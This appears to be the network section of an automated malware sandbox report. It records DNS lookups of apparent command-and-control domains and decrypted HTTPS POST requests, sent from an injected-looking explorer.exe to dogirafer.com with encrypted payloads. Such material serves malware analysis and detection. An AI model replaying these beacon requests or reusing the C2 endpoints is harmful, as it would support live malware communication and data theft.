Dec 3, 2024 17:46:28.179740906 CET	443	50036	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:28.297790051 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:28.297852039 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:28.298201084 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:28.298532009 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:28.298564911 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:29.570341110 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:29.573064089 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:29.573563099 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:29.573584080 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:29.577805042 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:29.577828884 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:31.178282976 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:31.178359985 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:31.178390980 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:31.178405046 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:31.178448915 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:31.178736925 CET	50037	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:31.178755045 CET	443	50037	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:31.271085978 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:31.271130085 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:31.271202087 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:31.271553993 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:31.271569014 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:32.535201073 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:32.535273075 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:32.535841942 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:32.535852909 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:32.536092043 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:32.536097050 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:34.164037943 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:34.164169073 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:34.167273045 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:34.167273045 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:34.218940020 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:34.218998909 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:34.219108105 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:34.219482899 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:34.219499111 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:34.464759111 CET	50038	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:34.464781046 CET	443	50038	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:35.482191086 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:35.482630968 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:35.483274937 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:35.483288050 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:35.483654022 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:35.483661890 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:37.154943943 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:37.155004025 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:37.155049086 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:37.155064106 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:37.155092001 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:37.155122042 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:37.155461073 CET	50039	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:37.155483007 CET	443	50039	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:37.406027079 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:37.406065941 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:37.406135082 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:37.406620979 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:37.406635046 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:38.669828892 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:38.669900894 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:38.670545101 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:38.670557976 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:38.670803070 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:38.670806885 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:40.295681953 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:40.295772076 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:40.300913095 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:40.309459925 CET	50040	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:40.309479952 CET	443	50040	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:40.703177929 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:40.703229904 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:40.703299046 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:40.703917980 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:40.703929901 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:41.919331074 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:41.921133995 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:41.921644926 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:41.921644926 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:41.921652079 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:41.921665907 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:43.513241053 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:43.513353109 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:43.513355017 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:43.513566971 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:43.513767958 CET	50041	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:43.513783932 CET	443	50041	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:43.613526106 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:43.613559008 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:43.614111900 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:43.614916086 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:43.614929914 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:44.882911921 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:44.882993937 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:44.883688927 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:44.883701086 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:44.883863926 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:44.883874893 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:46.549597025 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:46.549669027 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:46.549681902 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:46.549695015 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:46.549752951 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:46.549752951 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:46.550462961 CET	50042	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:46.550477982 CET	443	50042	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:46.660290003 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:46.660342932 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:46.660402060 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:46.660797119 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:46.660810947 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:47.937808037 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:47.937902927 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:47.938448906 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:47.938455105 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:47.938709974 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:47.938714981 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:49.573447943 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:49.573549032 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:49.573647976 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:49.574176073 CET	50043	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:49.574192047 CET	443	50043	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:49.638103962 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:49.638163090 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:49.639028072 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:49.642945051 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:49.642965078 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:50.975056887 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:50.975117922 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:50.975620985 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:50.975626945 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:50.976047039 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:50.976052999 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:52.624910116 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:52.624977112 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:52.624996901 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:52.625020981 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:52.625067949 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:52.625330925 CET	50044	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:52.625349998 CET	443	50044	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:52.699645042 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:52.699692011 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:52.699791908 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:52.700160980 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:52.700172901 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:54.007546902 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:54.009056091 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:54.016364098 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:54.016364098 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:54.016376972 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:54.016393900 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:55.621129036 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:55.621211052 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:55.623063087 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:55.625025034 CET	50045	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:55.625046968 CET	443	50045	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:55.701091051 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:55.701129913 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:55.705375910 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:55.705677032 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:55.705697060 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:56.971674919 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:56.971791983 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:56.979481936 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:56.979486942 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:56.980015993 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:56.980020046 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:58.640680075 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:58.640752077 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:58.640762091 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:58.640786886 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:58.640818119 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:58.640831947 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:58.641356945 CET	50046	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:58.641371965 CET	443	50046	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:58.731570959 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:58.731620073 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:46:58.731683016 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:58.732060909 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:46:58.732075930 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:00.009737015 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:00.013389111 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:00.014015913 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:00.014015913 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:00.014027119 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:00.014045000 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:01.667237043 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:01.667345047 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:01.670562029 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:01.671770096 CET	50047	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:01.671792030 CET	443	50047	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:01.838841915 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:01.838885069 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:01.839093924 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:01.839363098 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:01.839378119 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:03.056358099 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:03.056417942 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:03.056860924 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:03.056869984 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:03.057051897 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:03.057056904 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:04.446767092 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:04.446893930 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:04.446898937 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:04.446996927 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:04.447458982 CET	50048	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:04.447474003 CET	443	50048	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:04.717176914 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:04.717212915 CET	443	50049	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:04.717273951 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:04.717664003 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:04.717678070 CET	443	50049	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:05.980613947 CET	443	50049	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:05.980917931 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:05.981571913 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:05.981571913 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:05.981579065 CET	443	50049	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:05.981592894 CET	443	50049	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:07.616720915 CET	443	50049	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:07.616821051 CET	443	50049	104.21.68.89	192.168.2.4
Dec 3, 2024 17:47:07.616838932 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:07.616884947 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:09.294464111 CET	50049	443	192.168.2.4	104.21.68.89
Dec 3, 2024 17:47:09.294481993 CET	443	50049	104.21.68.89	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2024 17:43:05.333806992 CET	60967	53	192.168.2.4	1.1.1.1
Dec 3, 2024 17:43:06.009567976 CET	53	60967	1.1.1.1	192.168.2.4
Dec 3, 2024 17:43:17.188621998 CET	59712	53	192.168.2.4	1.1.1.1
Dec 3, 2024 17:43:17.560465097 CET	53	59712	1.1.1.1	192.168.2.4
Dec 3, 2024 17:44:46.378952026 CET	53206	53	192.168.2.4	1.1.1.1
Dec 3, 2024 17:44:47.370980024 CET	53206	53	192.168.2.4	1.1.1.1
Dec 3, 2024 17:44:48.371179104 CET	53206	53	192.168.2.4	1.1.1.1
Dec 3, 2024 17:44:50.386573076 CET	53206	53	192.168.2.4	1.1.1.1
Dec 3, 2024 17:44:52.707484007 CET	53	53206	1.1.1.1	192.168.2.4
Dec 3, 2024 17:44:52.707532883 CET	53	53206	1.1.1.1	192.168.2.4
Dec 3, 2024 17:44:52.707602024 CET	53	53206	1.1.1.1	192.168.2.4
Dec 3, 2024 17:44:52.707612991 CET	53	53206	1.1.1.1	192.168.2.4
Dec 3, 2024 17:44:52.794950008 CET	63989	53	192.168.2.4	1.1.1.1
Dec 3, 2024 17:44:53.087979078 CET	53	63989	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 3, 2024 17:43:05.333806992 CET	192.168.2.4	1.1.1.1	0xf8bb	Standard query (0)	huanvn.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:43:17.188621998 CET	192.168.2.4	1.1.1.1	0xb3ac	Standard query (0)	vutarf.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:46.378952026 CET	192.168.2.4	1.1.1.1	0xc5b6	Standard query (0)	reateberam.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:47.370980024 CET	192.168.2.4	1.1.1.1	0xc5b6	Standard query (0)	reateberam.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:48.371179104 CET	192.168.2.4	1.1.1.1	0xc5b6	Standard query (0)	reateberam.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:50.386573076 CET	192.168.2.4	1.1.1.1	0xc5b6	Standard query (0)	reateberam.com	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:52.794950008 CET	192.168.2.4	1.1.1.1	0x8d8c	Standard query (0)	dogirafer.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 3, 2024 17:43:06.009567976 CET	1.1.1.1	192.168.2.4	0xf8bb	No error (0)	huanvn.com		103.57.249.207	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:43:17.560465097 CET	1.1.1.1	192.168.2.4	0xb3ac	No error (0)	vutarf.com		94.232.43.224	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:43:19.441998959 CET	1.1.1.1	192.168.2.4	0xd4b0	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:43:19.441998959 CET	1.1.1.1	192.168.2.4	0xd4b0	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:52.707484007 CET	1.1.1.1	192.168.2.4	0xc5b6	Server failure (2)	reateberam.com	none	none	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:52.707532883 CET	1.1.1.1	192.168.2.4	0xc5b6	Server failure (2)	reateberam.com	none	none	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:52.707602024 CET	1.1.1.1	192.168.2.4	0xc5b6	Server failure (2)	reateberam.com	none	none	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:52.707612991 CET	1.1.1.1	192.168.2.4	0xc5b6	Server failure (2)	reateberam.com	none	none	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:53.087979078 CET	1.1.1.1	192.168.2.4	0x8d8c	No error (0)	dogirafer.com		104.21.68.89	A (IP address)	IN (0x0001)	false
Dec 3, 2024 17:44:53.087979078 CET	1.1.1.1	192.168.2.4	0x8d8c	No error (0)	dogirafer.com		172.67.192.128	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dogirafer.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49851	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:44:54 UTC	411	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hmdViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 92 Cache-Control: no-cache
2024-12-03 16:44:54 UTC	92	OUT	Data Raw: 4c 48 44 4d 46 38 2f 6d 69 75 38 77 5a 78 61 4b 31 32 79 31 6e 6e 78 4f 50 30 44 66 44 43 71 37 50 4b 48 76 2f 6d 4f 49 4d 47 66 2f 7a 54 71 76 33 47 2f 55 36 50 72 6f 73 79 45 36 65 52 70 37 49 38 33 73 6e 6b 68 63 57 65 2f 71 78 36 78 74 7a 50 48 55 30 36 70 42 69 45 45 3d Data Ascii: LHDMF8/miu8wZxaK12y1nnxOP0DfDCq7PKHv/mOIMGf/zTqv3G/U6ProsyE6eRp7I83snkhcWe/qx6xtzPHU06pBiEE=
2024-12-03 16:44:55 UTC	791	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AuBzvzD76dL224KwDweftJXB8sucAz0nbU%2B8K4ns3u%2BsoNiVY5Jl4VQ9P%2BsgzhS9z0HkKP%2FaJlRpfz5O88sT6a%2Bk71PShGbnSm7JP6H7%2BY6%2FvQHCQOHyu36jePJBzIlK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec5062989abc334-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1484&rtt_var=1038&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1163&delivery_rate=855552&cwnd=247&unsent_bytes=0&cid=3924a51713f30bd0&ts=1604&x=0"
2024-12-03 16:44:55 UTC	98	IN	Data Raw: 35 63 0d 0a 4f 43 69 66 51 38 57 7a 33 6f 70 68 59 68 6a 62 6a 57 62 6c 67 33 39 4f 4d 30 50 56 44 53 44 43 62 66 61 30 74 79 58 45 62 57 6d 63 70 6d 48 34 31 47 37 53 37 50 71 47 74 6a 5a 74 4a 6b 55 74 65 4e 2f 6c 67 6c 67 6c 43 62 4f 35 33 71 6b 4c 73 5a 65 70 70 38 39 79 30 42 73 3d 0d 0a Data Ascii: 5cOCifQ8Wz3ophYhjbjWblg39OM0PVDSDCbfa0tyXEbWmcpmH41G7S7PqGtjZtJkUteN/lglglCbO53qkLsZepp89y0Bs=
2024-12-03 16:44:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49861	104.21.68.89	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:44:58 UTC	410	OUT	POST /test/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded Cookie: aXLYGobmm+hndViRxTPtzmAYfxODCSjYG4qyuCXJYVCgmRH81hrW6/ictDFrUzQseub33B0vDqTu8/JSvpK54Ytrr38FQTZAtZz+ZBAGQU8QSEm34sPNSmXfsGBKY94e4q9ghg3hs+aED3dzoROjTHWGSpduCb68dkVTPeGVOG9+uNo= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: dogirafer.com Content-Length: 0 Cache-Control: no-cache
2024-12-03 16:44:59 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 03 Dec 2024 16:44:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9o2S95TJS%2Fmbf8qF2gjKztFTET9n4LX0KaBTkQttjQj96HNifbMqLdQtRK4IFJTGt74b%2F2P%2F81fCi9alUU2Kw33C26Hm8ZPS8EF%2FdV5QI5XiG7vcmxPSdL7dVQUrmIKR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ec506409fe8f797-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1525&rtt_var=920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1914754&cwnd=147&unsent_bytes=0&cid=383ffcb5995d3afc&ts=1560&x=0"
2024-12-03 16:44:59 UTC	54	IN	Data Raw: 33 30 0d 0a 4d 69 6d 66 52 38 47 31 32 6f 70 6e 61 78 2f 65 67 32 48 6a 67 33 52 4c 4d 6b 72 56 41 79 44 43 5a 2f 61 7a 74 79 66 4b 59 32 6d 63 70 67 3d 3d 0d 0a Data Ascii: 30MimfR8G12opnax/eg2Hjg3RLMkrVAyDCZ/aztyfKY2mcpg==
